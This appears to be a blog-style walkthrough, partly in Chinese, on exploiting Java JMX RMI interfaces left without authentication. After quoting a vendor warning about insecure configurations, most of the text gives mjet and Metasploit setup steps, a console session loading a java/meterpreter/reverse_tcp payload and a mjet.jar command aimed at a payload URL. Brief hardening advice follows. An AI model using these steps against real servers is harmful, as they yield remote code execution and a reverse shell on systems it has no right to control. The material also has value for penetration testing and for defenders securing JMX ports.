JMX(Java Management Extensions,即Java管理扩展)是一个为应用程序、设备、系统等植入管理功能的框架。JMX可以跨越一系列异构操作系统平台、系统体系结构和网络传输协议,灵活的开发无缝集成的系统、网络和服务管理应用

Java Management Extensions (JMX) Technology



Disabling Security
To disable both password authentication and SSL (namely to disable all security), you should set the following system properties when you start the Java VM.

Caution - This configuration is insecure: any remote user who knows (or guesses) your port number and host name will be able to monitor and control your Java applications and platform. Furthermore, possible harm is not limited to the operations you define in your MBeans. A remote client could create a MBean and use it to create new MBeans from arbitrary URLs, at least if there is no security manager. In other words, a rogue remote client could make your Java application execute arbitrary code.

Consequently, while disabling security might be acceptable for development, it is strongly recommended that you do not disable security for production systems.


This module takes advantage a Java JMX interface insecure configuration, which would allow loading classes from any remote (HTTP) URL. JMX interfaces with authentication disabled ( should be vulnerable, while interfaces with authentication enabled will be vulnerable only if a weak configuration is deployed (allowing to use, having a security manager allowing to load a ClassLoader MBean, etc


漏洞利用程序可以使用mjet。过程参考JMX RMI Exploit Demo


git clone

Copy the "MBean" folder to "data/java/metasploit"
Copy java_mlet_server.rb to "modules/exploits/multi/misc/"

在kali 1.1.0中metasploit路径为/opt/metasploit/apps/pro/msf3


msf exploit(java_mlet_server) > use exploit/multi/misc/java_mlet_server 
msf exploit(java_mlet_server) > set payload java/meterpreter/reverse_tcp 
payload => java/meterpreter/reverse_tcp
msf exploit(java_mlet_server) > set LHOST
msf exploit(java_mlet_server) > set LPORT 29999
LPORT => 29999
msf exploit(java_mlet_server) > run
[*] Exploit running as background job.
[*] Started reverse handler on 
msf exploit(java_mlet_server) > [*] Using URL:
[*]  Local IP:
[*] Server started.

或得payload url,作为u参数。

java -jar mjet/mjet.jar -p 9090 -u -t


图片来自JMX RMI Exploit 实例


So it’s important to keep in mind that setting java.rmi.server.hostname has no effect on whether or not this is an insecure configuration. If you actually want to secure your JMX RMI port, you have many options, such as (in decreasing order of preference):

Don’t pass This will start a local-only JMX server, and you can get the connection address from
Enable SSL client certificate authentication
Enable password authentication and use SSL
Firewall your JMX RMI port
+ See more at:


Exploiting JMX RMI